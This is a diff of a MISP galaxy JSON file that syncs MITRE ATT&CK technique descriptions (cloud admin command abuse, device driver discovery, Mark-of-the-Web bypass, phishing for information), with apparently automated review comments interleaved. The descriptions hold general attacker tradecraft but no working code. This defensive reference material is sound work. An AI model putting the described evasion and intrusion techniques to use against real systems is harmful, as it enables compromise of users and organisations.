.(Citation: Technet Windows Time Service)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)",
"meta": {
"external_id": "T1124",
"kill_chain": [
@@ -13660,14 +13786,15 @@
"Process: Process Creation"
],
"mitre_platforms": [
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/",
"https://attack.mitre.org/techniques/T1124",
- "https://capec.mitre.org/data/definitions/295.html",
"https://msdn.microsoft.com/ms724961.aspx",
"https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674",
"https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf"
]
},
@@ -13689,7 +13816,7 @@
"value": "Determine strategic target - T1241"
},
{
- "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.\n\nBrowser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.",
+ "description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)",
"meta": {
"external_id": "T1217",
"kill_chain": [
@@ -13706,11 +13833,13 @@
"macOS"
],
"refs": [
- "https://attack.mitre.org/techniques/T1217"
+ "https://attack.mitre.org/techniques/T1217",
+ "https://support.google.com/chrome/a/answer/7349337",
+ "https://www.kaspersky.com/blog/browser-data-theft/27871/"
]
},
"uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
- "value": "Browser Bookmark Discovery - T1217"
+ "value": "Browser Information Discovery - T1217"
},
{
"description": "Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh
.\n\nAdversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)\n\nProof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)",
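Review bot: renaming the element value from "Browser Bookmark Discovery - T1217" to "Browser Information Discovery - T1217" while keeping uuid 5e4a2073-9643-44cb-a0b5-e7f4048446c7 changes the tag string MISP derives from the value, so existing tags and correlation rules keyed on the old name will stop matching; state the rename explicitly in the commit message and, if this cluster supports it, record the old name as a synonym so consumers can map across the change.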
@@ -13792,7 +13921,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1133",
- "https://capec.mitre.org/data/definitions/555.html",
"https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac",
"https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/",
"https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html",
@@ -13837,7 +13965,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1134",
- "https://capec.mitre.org/data/definitions/633.html",
"https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx",
"https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx",
"https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx",
@@ -13850,7 +13977,7 @@
"value": "Access Token Manipulation - T1134"
},
{
- "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)\n\nIn Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser
and Set-ADAccountPassword
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd
utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. ",
+ "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)\n\nIn Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser
and Set-ADAccountPassword
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd
utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. ",
"meta": {
"external_id": "T1531",
"kill_chain": [
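Review bot: the updated T1531 description string still ends with a trailing space before the closing quote (`objective. "`), carried over from the old text; trim it while the line is being touched. The wording changes ("or similar attacks", "in order to impede incident response/recovery") introduce no new `(Citation: ...)` markers, so leaving this entry's `refs` array untouched is consistent with the description.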
@@ -13896,7 +14023,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1135",
- "https://capec.mitre.org/data/definitions/643.html",
"https://en.wikipedia.org/wiki/Shared_resource",
"https://technet.microsoft.com/library/cc770880.aspx"
]
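Review bot: removing `https://capec.mitre.org/data/definitions/643.html` from the T1135 refs is only safe if no `(Citation: ...)` marker in the entry's description still refers to that CAPEC entry; the description is outside this hunk, so please confirm. The same CAPEC removals recur for T1195 and T1574/002 later in this patch, so a one-line mention in the commit message that CAPEC mappings were dropped in the upstream mitre/cti data would help anyone reading the history.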
@@ -14170,7 +14296,34 @@
"value": "Spearphishing via Service - T1194"
},
{
- "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path \\\\SYSVOL\\\\Policies\\
.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)\n\nAdversaries may use commands such as gpresult
or various publicly available PowerShell functions, such as Get-DomainGPO
and Get-DomainGPOLocalGroup
, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.",
+ "description": "Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020)\n\nIf an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)",
+ "meta": {
+ "external_id": "T1651",
+ "kill_chain": [
+ "mitre-attack:execution"
+ ],
+ "mitre_data_sources": [
+ "Command: Command Execution",
+ "Process: Process Creation",
+ "Script: Script Execution"
+ ],
+ "mitre_platforms": [
+ "IaaS",
+ "Azure AD"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1651",
+ "https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html",
+ "https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview",
+ "https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d",
+ "https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/"
+ ]
+ },
+ "uuid": "d94b3ae9-8059-4989-8e9f-ea0f601f80a7",
+ "value": "Cloud Administration Command - T1651"
+ },
+ {
+ "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)\n\nAdversaries may use commands such as gpresult
or various publicly available PowerShell functions, such as Get-DomainGPO
and Get-DomainGPOLocalGroup
, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.",
"meta": {
"external_id": "T1615",
"kill_chain": [
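Review bot: the new T1651 description uses a typographic apostrophe in `environment’s` while neighbouring descriptions use the ASCII `'` (compare `user's` in T1608.004 and T1189 in this same patch); normalise it so the JSON does not carry mixed apostrophe characters. This hunk also bundles a fix to the T1615 description (`predicable` -> `predictable`, and the `\\\\SYSVOL\\\\Policies\\` path now wrapped in backticks) with the insertion of a new technique; acceptable for a generated sync, but worth a sentence in the commit message. For T1651 itself, the `mitre_platforms` (`IaaS`, `Azure AD`) and the three `mitre_data_sources` (Command Execution, Process Creation, Script Execution) are consistent with the `mitre-attack:execution` kill-chain placement, and the five refs cover the three citation markers in the description.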
@@ -14270,9 +14423,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1195",
"https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities",
- "https://capec.mitre.org/data/definitions/437.html",
- "https://capec.mitre.org/data/definitions/438.html",
- "https://capec.mitre.org/data/definitions/439.html",
"https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/",
"https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf",
"https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E",
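Review bot: the three CAPEC refs (437, 438, 439) are removed from the middle of the T1195 refs array, so the comma structure stays valid; as with the T1135 hunk, confirm the description carries no `(Citation: ...)` markers that still depend on them. Note that this array already keeps a `web.archive.org` capture for the Symantec Elderwood whitepaper; that is the pattern to follow for the fragile vendor and social-media links added elsewhere in this patch.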
@@ -14967,7 +15117,7 @@
"value": "Implant Internal Image - T1525"
},
{
- "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. \n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)",
+ "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable Cloud Logs](https://attack.mitre.org/techniques/T1562/008).",
"meta": {
"external_id": "T1526",
"kill_chain": [
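Review bot: the expanded T1526 description links two sub-techniques, [Disable or Modify Tools](T1562/001) and [Disable Cloud Logs](T1562/008); both must resolve to entries in this cluster file, otherwise the markdown link renders as a dangling ATT&CK URL in the HTML galaxy. No new `(Citation: ...)` markers were introduced (the added sentences on GuardDuty, Defender for Cloud, CloudTrail and Cloud Audit Logs are uncited), so leaving the refs unchanged is consistent.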
@@ -14994,6 +15144,37 @@
"uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db",
"value": "Cloud Service Discovery - T1526"
},
+ {
+ "description": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).\n\nMany OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers)\n\nOn Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)",
+ "meta": {
+ "external_id": "T1652",
+ "kill_chain": [
+ "mitre-attack:discovery"
+ ],
+ "mitre_data_sources": [
+ "Command: Command Execution",
+ "Process: OS API Execution",
+ "Process: Process Creation",
+ "Windows Registry: Windows Registry Key Access"
+ ],
+ "mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1652",
+ "https://learn.microsoft.com/windows-hardware/drivers/install/overview-of-registry-trees-and-keys",
+ "https://learn.microsoft.com/windows-server/administration/windows-commands/driverquery",
+ "https://learn.microsoft.com/windows/win32/api/psapi/nf-psapi-enumdevicedrivers",
+ "https://linux.die.net/man/8/modinfo",
+ "https://man7.org/linux/man-pages/man8/lsmod.8.html",
+ "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf"
+ ]
+ },
+ "uuid": "215d9700-5881-48b8-8265-6449dbb7195d",
+ "value": "Device Driver Discovery - T1652"
+ },
{
"description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time. \n\nThere are many ways an adversary may hijack the flow of execution. A primary way is by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs or resources, such as file directories, could also be poisoned to include malicious payloads.",
"meta": {
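Review bot: the T1652 description states that on Linux/macOS kernel modules "may be visible within `/dev`"; `/dev` exposes device nodes, not the modules themselves, which are what `lsmod` and `modinfo` list as the same sentence goes on to say, so the claim is imprecise. Because this is upstream ATT&CK text synced from mitre/cti, the fix belongs upstream rather than in a local edit, but it is worth flagging. The data sources (`Command Execution`, `OS API Execution`, `Process Creation`, `Windows Registry Key Access`) line up with the `driverquery.exe`, `EnumDeviceDrivers()` and Registry mentions in the text. The refs mix `man7.org` for lsmod with `linux.die.net` for modinfo; that also mirrors upstream and is acceptable for a sync.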
@@ -16018,6 +16199,7 @@
"Process: Process Access",
"User Account: User Account Authentication",
"User Account: User Account Modification",
+ "Windows Registry: Windows Registry Key Creation",
"Windows Registry: Windows Registry Key Modification"
],
"mitre_platforms": [
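Review bot: the technique receiving the new `Windows Registry: Windows Registry Key Creation` data source cannot be identified from this hunk's context lines (only neighbouring data sources are visible); when reviewing generated syncs like this, wider context would make the change auditable. The insertion keeps the array's alphabetical order (`Key Creation` before `Key Modification`), which is correct.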
@@ -16109,7 +16291,7 @@
"value": "Search Closed Sources - T1597"
},
{
- "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.",
+ "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. 
Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)",
"meta": {
"external_id": "T1598",
"kill_chain": [
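Review bot: in the new T1598 text, `spoofing(Citation: Proofpoint-spoof)` lacks the space before the citation marker that the other `(Citation: ...)` markers in this description have; upstream wording, but it affects how the citation is rendered. The rewrite introduces five new markers (Avertium callback phishing, Proofpoint-spoof, cyberproof-double-bounce, Microsoft OAuth Spam 2022, Palo Alto Unit 42 VBA Infostealer 2014), which require five matching refs; the following hunk adds exactly five. The long-standing `TrendMictro Phishing` typo in an existing citation key is left as-is.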
@@ -16125,12 +16307,17 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1598",
+ "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends",
"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide",
"https://github.com/ryhanson/phishery",
"https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/",
"https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/",
+ "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/",
+ "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing",
"https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf",
+ "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/",
"https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages",
+ "https://www.proofpoint.com/us/threat-reference/email-spoofing",
"https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html"
]
},
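Review bot: the five refs added here (cyberproof, unit42, avertium, microsoft OAuth 2022, proofpoint) land in the lexicographically sorted positions the array already uses and map one-to-one onto the five new citation markers in the preceding T1598 description hunk. The Avertium and Proofpoint links are vendor content pages that move frequently; consider adding `web.archive.org` captures alongside them, as this file already does for older vendor whitepapers.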
@@ -16191,7 +16378,7 @@
"value": "At (Linux) - T1053.001"
},
{
- "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier
with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)",
+ "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier
with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)",
"meta": {
"external_id": "T1553.005",
"kill_chain": [
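Review bot: this hunk is a single typo fix in the T1553.005 description (`in not known` -> `is not known`) with the rest of the string byte-identical; nothing else to check. While it is being touched, "MOTW is a NTFS feature" should read "an NTFS feature", but that is upstream text.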
@@ -16317,7 +16504,7 @@
"value": "One-Way Communication - T1102.003"
},
{
- "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).\n\nAdversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. 
In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)\n\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
+ "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).\n\nAdversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:\n\n* Inserting malicious scripts into web pages or other user controllable web content such as forum posts\n* Modifying script files served to websites from publicly writeable cloud storage buckets\n* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n\nIn addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT 
ScanBox)\n\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
"meta": {
"external_id": "T1608.004",
"kill_chain": [
